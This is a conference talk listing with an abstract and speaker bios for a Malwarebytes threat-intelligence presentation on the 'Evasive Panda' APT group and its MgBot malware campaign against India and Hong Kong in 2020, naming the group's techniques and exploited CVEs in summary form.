Presentation information

A new Chinese APT ‘Evasive Panda’ group targets India and Hong Kong using a new variant of MgBot malware
FREE REGISTRATION

A new Chinese APT ‘Evasive Panda’ group targets India and Hong Kong using a new variant of MgBot malware

Hossein Jazi (Malwarebytes) & Jérôme Segura (Malwarebytes)
live only
16:00 UTC on Day 1
WEDNESDAY 30 SEPTEMBER

Downloads

In July 2020 we observed an APT campaign that targeted India and Hong Kong using a new variant of the MgBot malware. In this campaign, the actor used several advanced TTPs to perform its operations, such as:
  • Squiblydoo: using regsvr32.dll to load a COM scriptlet directly from the Internet and execute it to bypass application whitelisting.

  • UAC bypass through the use of the CMSTPLUA COM interface.

  • File download using CertUtil.

  • Process injection through the use of the Application Management (AppMgmt) Service on Windows.

  • Execution through Module Load (using a dropped variant of rundll32.exe to execute the payloads).

Our research into this campaign led us to uncover a new Chinese APT group that we believe has been active since at least 2014. Based on the contents of the document used by this campaign, which are aligned with Chinese government interests, we believe it is likely that this actor is being sponsored by the government of China.

This group is capable of using different techniques to initiate its attacks. We observed that the actor has used malicious documents weaponized with macros or DDE to target victims. The group has also used vulnerabilities in Microsoft Office and VBScript engine (CVE-2012-0158 and CVE-2018-8174) to perform its attack. This APT group is capable of developing its own malware, such as MgBot, as well as using commercial tools like CobaltStrike in its attacks. We also have identified that this group has developed an Android RAT called Ksremote to target mobile users.

In this talk we will provide more details about the activities of this APT group, including its campaigns, toolsets, TTPs and the infrastructure used by this actor.
Hossein Jazi
Malwarebytes Hossein Jazi is Senior Threat Intelligence Analyst at Malwarebytes. He is an active researcher whose research interests include APT tracking, malware analysis and cyber threat intelligence. Currently his focus is on tracking APT campaigns as well as developing machine-learning based models to attribute threat actors. He has been specializing in cybersecurity and APT analysis for over 10 years.
Jérôme Segura
Malwarebytes Jérôme Segura is Director of Threat Intelligence at Malwarebytes. His passion is in identifying new infection vectors or schemes and taking them apart in technical, yet accessible blog posts. Over the years, he has worked with law enforcement and industry partners to report and take down scams, malvertising and other web threats.
arrow left Back

A new Chinese APT ‘Evasive Panda’ group targets India and Hong Kong using a new variant of MgBot malware

16:00 - 16:30 UTC Wed 30 Sept 2020
Hossein Jazi (Malwarebytes) & Jérôme Segura (Malwarebytes)
In July 2020 we observed an APT campaign that targeted India and Hong Kong using a new variant of the MgBot malware. In this campaign, the actor used several advanced TTPs to perform its operations, such as:
  • Squiblydoo: using regsvr32.dll to load a COM scriptlet directly from the Internet and execute it to bypass application whitelisting.

  • UAC bypass through the use of the CMSTPLUA COM interface.

  • File download using CertUtil.

  • Process injection through the use of the Application Management (AppMgmt) Service on Windows.

  • Execution through Module Load (using a dropped variant of rundll32.exe to execute the payloads).

Our research into this campaign led us to uncover a new Chinese APT group that we believe has been active since at least 2014. Based on the contents of the document used by this campaign, which are aligned with Chinese government interests, we believe it is likely that this actor is being sponsored by the government of China.

This group is capable of using different techniques to initiate its attacks. We observed that the actor has used malicious documents weaponized with macros or DDE to target victims. The group has also used vulnerabilities in Microsoft Office and VBScript engine (CVE-2012-0158 and CVE-2018-8174) to perform its attack. This APT group is capable of developing its own malware, such as MgBot, as well as using commercial tools like CobaltStrike in its attacks. We also have identified that this group has developed an Android RAT called Ksremote to target mobile users.

In this talk we will provide more details about the activities of this APT group, including its campaigns, toolsets, TTPs and the infrastructure used by this actor.
Hossein Jazi
Malwarebytes Hossein Jazi is Senior Threat Intelligence Analyst at Malwarebytes. He is an active researcher whose research interests include APT tracking, malware analysis and cyber threat intelligence. Currently his focus is on tracking APT campaigns as well as developing machine-learning based models to attribute threat actors. He has been specializing in cybersecurity and APT analysis for over 10 years.
Jérôme Segura
Malwarebytes Jérôme Segura is Director of Threat Intelligence at Malwarebytes. His passion is in identifying new infection vectors or schemes and taking them apart in technical, yet accessible blog posts. Over the years, he has worked with law enforcement and industry partners to report and take down scams, malvertising and other web threats.